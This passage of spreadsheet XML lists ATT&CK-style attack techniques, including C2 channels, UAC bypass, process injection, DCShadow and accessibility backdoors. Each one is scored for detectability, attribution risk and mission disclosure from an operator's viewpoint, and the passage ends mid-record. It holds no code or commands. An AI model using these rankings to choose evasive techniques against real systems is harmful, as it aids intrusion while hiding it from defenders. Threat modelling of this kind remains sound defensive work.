    <s v="A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap.1_x000a__x000a_The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other._x000a__x000a_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
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Custom Command and Control Protocol"/>
    <x v="7"/>
    <s v="Adversaries may communicate using a custom command and control protocol instead of using existing Standard Application Layer Protocol to encapsulate commands. Implementations could mimic well-known protocols."/>
    <n v="2"/>
    <s v="Unusual traffic is easy detected"/>
    <n v="4"/>
    <s v="The source is easily to detect"/>
    <n v="1"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Custom Cryptographic Protocol"/>
    <x v="7"/>
    <s v="Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext._x000a__x000a_Custom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used._x000a__x000a_Some adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors."/>
    <n v="2"/>
    <s v="Unusual traffic is easy detected"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Data Encoding"/>
    <x v="7"/>
    <s v="Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, UTF-8, or other binary-to-text and character encoding systems.12 Some data encoding systems may also result in data compression, such as gzip."/>
    <n v="2"/>
    <s v="Encoding is easily decoded"/>
    <n v="1"/>
    <s v="Encoding is simply reversed, thus showing payload"/>
    <n v="3"/>
    <s v="Encoding is simply reversed, thus showing payload"/>
  </r>
  <r>
    <s v="Data Obfuscation"/>
    <x v="7"/>
    <s v="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
    <n v="1"/>
    <s v="Harder to decode than regular encoding but decodable without secret"/>
    <n v="1"/>
    <s v="Harder to decode than regular encoding but decodable without secret"/>
    <n v="3"/>
    <s v="Harder to decode than regular encoding but decodable without secret"/>
  </r>
  <r>
    <s v="Domain Fronting"/>
    <x v="7"/>
    <s v="Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS.1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quot;domainless&quot; fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored)._x000a__x000a_For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y."/>
    <n v="0"/>
    <s v="Very hard to distinguish from legitimate traffic"/>
    <n v="2"/>
    <s v="Server behind the fronting can be identified and if public may be used to intercept"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Fallback Channels"/>
    <x v="7"/>
    <s v="Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds."/>
    <n v="2"/>
    <s v="Due to the static character (fallback must always be available) IOC's may exist."/>
    <n v="3"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Multi-Stage Channels"/>
    <x v="7"/>
    <s v="Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult._x000a__x000a_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_x000a__x000a_The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or Fallback Channels in case the original first-stage communication path is discovered and blocked."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Multi-hop Proxy"/>
    <x v="7"/>
    <s v="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n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Multiband Communication"/>
    <x v="7"/>
    <s v="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
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Remote Access Tools"/>
    <x v="7"/>
    <s v="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1_x000a__x000a_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_x000a__x000a_Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="3"/>
    <s v="Public services can be tied back to an attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Standard Application Layer Protocol"/>
    <x v="7"/>
    <s v="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_x000a__x000a_For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP."/>
    <n v="2"/>
    <s v="Uncommon data flows"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Standard Cryptographic Protocol"/>
    <x v="7"/>
    <s v="Adversaries use command and control over an encrypted channel using a known encryption protocol like HTTPS or SSL/TLS. The use of strong encryption makes it difficult for defenders to detect signatures within adversary command and control traffic._x000a__x000a_Some adversaries may use other encryption protocols and algorithms with symmetric keys, such as RC4, that rely on encryption keys encoded into malware configuration files and not public key cryptography. Such keys may be obtained through malware reverse engineering."/>
    <n v="1"/>
    <m/>
    <n v="0"/>
    <s v="Little additional evidence towards agent"/>
    <n v="0"/>
    <s v="Cryptography makes data unavailable"/>
  </r>
  <r>
    <s v="Standard Non-Application Layer Protocol"/>
    <x v="7"/>
    <s v="Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.1 Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), and transport layer protocols, such as the User Datagram Protocol (UDP)._x000a__x000a_ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts;2 however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications."/>
    <n v="2"/>
    <s v="Uncommon data flows"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Uncommonly Used Port"/>
    <x v="7"/>
    <s v="Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured."/>
    <n v="3"/>
    <s v="Monitoring for network usage"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="1"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="Web Service"/>
    <x v="7"/>
    <s v="Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system._x000a__x000a_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_x000a__x000a_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_x000a__x000a_Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed)."/>
    <n v="1"/>
    <s v="Reputation based analysis"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Access Token Manipulation"/>
    <x v="8"/>
    <s v="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runas. 1_x000a__x000a_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2_x000a__x000a_Access tokens can be leveraged by adversaries through three methods:3_x000a__x000a_Token Impersonation/Theft - An adversary creates a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system._x000a__x000a_Create Process with a Token - An adversary creates a new access token with DuplicateToken(Ex) and uses it with CreateProcessWithTokenW to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user._x000a__x000a_Make and Impersonate Token -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_x000a__x000a_Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account._x000a__x000a_Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. 4 The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. 5"/>
    <n v="1"/>
    <s v="Detectionrisk is low due to advanced monitoring of individual machines"/>
    <n v="0"/>
    <s v="Does not disclose attacker"/>
    <n v="0"/>
    <s v="Does not disclose mission details"/>
  </r>
  <r>
    <s v="Accessibility Features"/>
    <x v="8"/>
    <s v="For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with &quot;cmd.exe&quot; (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges.3_x000a__x000a_For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures &quot;cmd.exe,&quot; or another program that provides backdoor access, as a &quot;debugger&quot; for the accessibility program (e.g., &quot;utilman.exe&quot;). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the &quot;debugger&quot; program to be executed with SYSTEM privileges.3"/>
    <n v="3"/>
    <s v="Unusual RDP sessions may give it away. Manipulated binaries as well"/>
    <n v="3"/>
    <s v="If public RDP server is used, connection may be traced to attacker"/>
    <n v="2"/>
    <s v="Target RDP server may hint towards mission's target"/>
  </r>
  <r>
    <s v="AppCert DLLs"/>
    <x v="8"/>
    <s v="Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions:1_x000a__x000a_CreateProcess_x000a_CreateProcessAsUser_x000a_CreateProcessWithLoginW_x000a_CreateProcessWithTokenW_x000a_WinExec_x000a_Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer."/>
    <n v="1"/>
    <s v="Needs extensive monitoring on local machine (registry and memory)"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="AppInit DLLs"/>
    <x v="8"/>
    <s v="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1 Similar to Process Injection, these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.2_x000a__x000a_The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled.3"/>
    <n v="1"/>
    <s v="Needs extensive monitoring on local machine (registry and memory)"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Application Shimming"/>
    <x v="8"/>
    <s v="To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to Hooking, utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc."/>
    <n v="3"/>
    <s v="Very visible for system admins"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Bypass User Account Control"/>
    <x v="8"/>
    <s v="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1_x000a__x000a_If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box.23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4 Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected._x000a__x000a_Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods5 that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:_x000a__x000a_eventvwr.exe can auto-elevate and execute a specified binary or script.67_x000a_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8"/>
    <n v="1"/>
    <s v="Due to variants hard to detect all versions"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="DLL Search Order Hijacking"/>
    <x v="8"/>
    <s v="controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program._x000a__x000a_Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace."/>
    <n v="3"/>
    <s v="Altering of system configuration"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Exploitation for Privilege Escalation"/>
    <x v="8"/>
    <s v="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_x000a__x000a_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
    <n v="2"/>
    <s v="Detectable due to IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Extra Window Memory Injection"/>
    <x v="8"/>
    <s v="Execution granted through EWM injection may take place in the address space of a separate live process. Similar to Process Injection, this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.4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n v="0"/>
    <s v="Very hard to detect due to the specifics of the attack"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="File System Permissions Weakness"/>
    <x v="8"/>
    <s v="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n v="1"/>
    <s v="Local IDS may pick up on hash changes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Image File Execution Options Injection"/>
    <x v="8"/>
    <s v="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1_x000a__x000a_IFEOs can be set directly via the Registry or in Global Flags via the Gflags tool.2 IFEOs are represented as Debugger Values in the Registry under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/&lt;executable&gt; and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt; where &lt;executable&gt; is the binary on which the debugger is attached.1_x000a__x000a_Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.3 Installing IFEO mechanisms may also provide Persistence via continuous invocation._x000a__x000a_Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications."/>
    <n v="1"/>
    <s v="Check for unusual parents to processes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="New Service"/>
    <x v="8"/>
    <s v="When operating systems boot up, they can start programs or applications called services that perform background system functions.1 A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry._x000a__x000a_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
    <n v="2"/>
    <s v="Configuration changes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Path Interception"/>
    <x v="8"/>
    <s v="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1_x000a__x000a_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n v="2"/>
    <s v="Multiple indicators"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Port Monitors"/>
    <x v="8"/>
    <s v="A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.1 This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.2 Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The Registry key contains entries for the following:_x000a__x000a_Local Port_x000a_Standard TCP/IP Port_x000a_USB Monitor_x000a_WSD Port_x000a_Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM."/>
    <n v="2"/>
    <s v="Registry setting monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Process Injection"/>
    <x v="8"/>
    <s v="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_x000a_There are multiple approaches to injecting code into a live process. Windows implementations include:1_x000a__x000a_Dynamic-link library (DLL) injection involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread._x000a_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2_x000a_Thread execution hijacking involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended._x000a_Asynchronous Procedure Call (APC) injection involves attaching malicious code to the APC Queue3 of a process's thread. Queued APC functions are executed when the thread enters an alterable state. AtomBombing 4 is a variation that utilizes APCs to invoke malicious code previously written to the global atom table.5_x000a_Thread Local Storage (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point.6"/>
    <n v="0"/>
    <s v="Hard to detect"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="SID-History Injection"/>
    <x v="8"/>
    <s v="The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens.1 An account can hold additional SIDs in the SID-History Active Directory attribute2, allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens)._x000a__x000a_Adversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values3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 Windows Admin Shares, or Windows Remote Management."/>
    <n v="3"/>
    <s v="System events are raised"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Scheduled Task"/>
    <x v="8"/>
    <s v="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1_x000a__x000a_An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account."/>
    <n v="2"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Service Registry Permissions Weakness"/>
    <x v="8"/>
    <s v="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1_x000a__x000a_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_x000a__x000a_Adversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted."/>
    <n v="1"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Access Token Manipulation"/>
    <x v="9"/>
    <s v="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runas. 1_x000a__x000a_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2_x000a__x000a_Access tokens can be leveraged by adversaries through three methods:3_x000a__x000a_Token Impersonation/Theft - An adversary creates a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system._x000a__x000a_Create Process with a Token - An adversary creates a new access token with DuplicateToken(Ex) and uses it with CreateProcessWithTokenW to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user._x000a__x000a_Make and Impersonate Token -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_x000a__x000a_Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account._x000a__x000a_Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. 4 The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. 5"/>
    <n v="1"/>
    <s v="Detectionrisk is low due to advanced monitoring of individual machines"/>
    <n v="0"/>
    <s v="Does not disclose attacker"/>
    <n v="0"/>
    <s v="Does not disclose mission details"/>
  </r>
  <r>
    <s v="BITS Jobs"/>
    <x v="9"/>
    <s v="Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM)1.2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_x000a__x000a_The interface to create and manage BITS jobs is accessible through PowerShell 2 and the BITSAdmin tool.3_x000a__x000a_Adversaries may abuse BITS to download, execute, and even clean up after malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.456 BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).74_x000a__x000a_BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol."/>
    <n v="3"/>
    <s v="Standard tooling is used, which may lead to logs/audit trails"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="4"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Binary Padding"/>
    <x v="9"/>
    <s v="Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists."/>
    <n v="1"/>
    <s v="Needs extensive monitoring on local machine (registry and memory)"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="CMSTP"/>
    <x v="9"/>
    <s v="The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles.1 CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections._x000a__x000a_Adversaries may supply CMSTP.exe with INF files infected with malicious commands.2 Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs3 and/or COM scriptlets (SCT) from remote servers.45 This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application._x000a__x000a_CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface"/>
    <n v="1"/>
    <s v="Very hard to detect, inf files may reside"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Code Signing"/>
    <x v="9"/>
    <s v="Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with.1 However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries2. The certificates used during an operation may be created, forged, or stolen by the adversary.34_x000a__x000a_Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform.1_x000a__x000a_Code signing certificates may be used to bypass security policies that require signed code to execute on a system."/>
    <n v="1"/>
    <s v="Discrepancy between certificate owner/issuer and expected certified products may be indication"/>
    <n v="2"/>
    <s v="Certificates are identifiable to organisation"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Component Firmware"/>
    <x v="9"/>
    <s v="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
    <n v="1"/>
    <s v="Hard to detect"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Component Object Model Hijacking"/>
    <x v="9"/>
    <s v="The Microsoft Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.1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2 An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection."/>
    <n v="2"/>
    <s v="Disk and registry altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="DCShadow"/>
    <x v="9"/>
    <s v="DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC).12 Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys._x000a__x000a_Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash.3_x000a__x000a_This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors).1 The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="DLL Side-Loading"/>
    <x v="9"/>
    <s v="Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests1 are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL.2_x000a__x000a_Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process."/>
    <n v="1"/>
    <s v="Unusual activity within the process could be observed"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="DLL Search Order Hijacking"/>
    <x v="9"/>
    <s v="Windows systems use a common method to look for required DLLs to load into a program.1 Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence._x000a__x000a_Adversaries may perform DLL preloading, also called binary planting attacks,2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3 Adversaries may use this behavior to cause the program to load a malicious DLL._x000a__x000a_Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation.456_x000a__x000a_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_x000a__x000a_Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace."/>
    <n v="3"/>
    <s v="Altering of system configuration"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Deobfuscate/Decode Files or Information"/>
    <x v="9"/>
    <s v="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Scripting, PowerShell, or by using utilities present on the system._x000a__x000a_One such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file.1_x000a__x000a_Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.2_x000a__x000a_Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with Obfuscated Files or Information during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.3 Adversaries may also used compressed or archived scripts, such as Javascript."/>
    <n v="1"/>
    <s v="Harder to decode than regular encoding but decodable without secret"/>
    <n v="1"/>
    <s v="Harder to decode than regular encoding but decodable without secret"/>
    <n v="3"/>
    <s v="Harder to decode than regular encoding but decodable without secret"/>
  </r>
  <r>
    <s v="Disabling Security Tools"/>
    <x v="9"/>
    <s v="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
    <n v="4"/>
    <s v="User may miss software running (such as Antivirus)"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Exploitation for Defense Evasion"/>
    <x v="9"/>
    <s v="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_x000a__x000a_Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for Security Software Discovery. The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection."/>
    <n v="0"/>
    <s v="Very hard to detect, instability may be an indicator"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Extra Window Memory Injection"/>
    <x v="9"/>
    <s v="Execution granted through EWM injection may take place in the address space of a separate live process. Similar to Process Injection, this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.4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n v="0"/>
    <s v="Very hard to detect due to the specifics of the attack"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="File Deletion"/>
    <x v="9"/>
    <s v="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_x000a__x000a_There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools."/>
    <n v="0"/>
    <s v="Del commands are not detected, secure wipes removes evidence "/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="File System Logical Offsets"/>
    <x v="9"/>
